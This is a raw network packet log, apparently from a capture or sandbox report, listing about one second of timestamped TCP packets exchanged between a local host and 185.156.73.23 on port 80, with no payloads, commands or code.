Dec 20, 2024 16:13:35.846874952 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.847330093 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.847609997 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.847645998 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.847692013 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.848507881 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.848545074 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.848568916 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.848608017 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.849265099 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.849302053 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.849332094 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.849335909 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.849349976 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.849378109 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.851720095 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.851788998 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.852615118 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.852632046 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.852643013 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.852659941 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.852690935 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.853410006 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.853425026 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.853458881 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.853490114 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.854214907 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.854228973 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.854239941 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.854266882 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.854298115 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.855040073 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.855052948 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.855097055 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.855947018 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.855994940 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.856286049 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.856338024 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.858814955 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.858874083 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.859638929 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.859652042 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.859664917 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.859695911 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.859729052 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.860495090 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.860507011 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.860533953 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.860558987 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.861339092 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.861352921 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.861378908 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.861396074 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.862174034 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.862186909 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.862225056 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.862945080 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.862958908 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.862983942 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.863015890 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.863815069 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.863827944 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.863838911 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.863862038 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.863897085 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.864613056 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.864654064 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.864694118 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.865483046 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.865511894 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.865529060 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.865561008 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.866317034 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.866332054 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.866368055 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.867290020 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.867311001 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.867358923 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.868035078 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.868047953 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.868086100 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.868766069 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.868793011 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.868805885 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.868817091 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.868844032 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.869617939 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.869631052 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.869668007 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.869684935 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.870465040 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.870479107 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.870515108 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.870524883 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.871242046 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.871272087 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.871294975 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.871308088 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.872086048 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.872114897 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.872134924 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.872158051 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.872950077 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.872967005 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.872983932 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.873044968 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.873044968 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.873765945 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.873783112 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.873806953 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.873820066 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.874584913 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.874634981 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.940757036 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.940902948 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.940959930 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.941008091 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.941859961 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.941920042 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.941982031 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.942034006 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.943737030 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.943809032 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.944047928 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.944097042 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.946019888 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.946083069 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.946527004 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.946594954 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.947886944 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.947957993 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.948020935 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.948071957 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.949846983 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.949917078 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.950066090 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.950124025 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.951965094 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.952033997 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.952184916 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.952234030 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.953948021 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.954003096 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.954103947 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.954148054 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.955950022 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.956006050 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.956136942 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.956181049 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.957986116 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.958036900 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.958194017 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.958256006 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.960131884 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.960196018 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.960262060 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.960315943 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.962061882 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.962131023 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.962357998 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.962416887 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.964088917 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.964144945 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.964327097 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.964375019 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.966555119 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.966619968 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.967072964 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.967124939 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.968183994 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.968245029 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.968465090 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.968513966 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.970216990 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.970283985 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.970422029 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.970475912 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.972417116 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.972476006 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.972806931 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.972865105 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.974386930 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.974453926 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.974687099 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.974737883 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.976541042 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.976609945 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.976742029 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.976783991 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.978349924 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.978416920 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.978648901 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.978704929 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.980489969 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.980535030 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.980720043 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.980782032 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.982511044 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.982614040 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.982726097 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.982835054 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.984467030 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.984519005 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.984707117 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.984760046 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.986541033 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.986613035 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:35.986692905 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:35.986745119 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.010620117 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.010693073 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.010735989 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.010766983 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.011107922 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.011161089 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.011239052 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.011279106 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.012228012 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.012276888 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.012690067 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.012742043 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.013906956 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.013988972 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.014152050 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.014209032 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.015572071 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.015635014 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.015779018 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.015832901 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.017245054 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.017298937 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.017765045 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.017813921 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.018842936 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.018903017 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.019253016 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.019310951 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.020513058 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.020562887 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.020665884 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.020746946 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.022248030 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.022320032 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.022387981 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.022434950 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.023736000 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.023789883 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.023926020 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.023979902 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.025386095 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.025441885 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.025882959 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.025927067 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.027059078 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.027095079 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.027365923 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.027411938 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.028822899 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.028889894 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.029347897 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.029417992 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.030685902 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.030747890 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.031369925 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.031428099 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.032197952 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.032250881 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.032344103 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.032394886 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.033612967 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.033669949 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.033865929 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.033915043 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.035238981 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.035295010 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.035654068 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.035706043 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.036922932 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.036986113 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.038393021 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.038460970 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.038639069 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.038676977 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.038695097 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.038731098 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.040153980 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.040210962 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.040396929 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.040450096 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.042787075 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.042853117 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.043484926 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.043523073 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.043543100 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.043562889 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.043853045 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.043900967 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.045129061 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.045171976 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.045717955 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.045767069 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.054258108 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.054339886 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.054742098 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.054801941 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.055161953 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.055218935 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.055350065 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.055401087 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.056756973 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.056813955 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.129398108 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.129511118 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.129610062 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.129653931 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.130155087 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.130199909 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.130472898 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.130521059 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.131830931 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.131994963 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.132137060 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.132190943 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.133635998 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.133672953 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.133687973 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.133717060 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.135147095 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.135199070 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.135364056 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.135413885 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.136811972 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.136862993 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.137332916 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.137382030 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.138442993 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.138494015 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.138578892 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.138638973 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.140077114 CET	80	49736	185.156.73.23	192.168.2.4
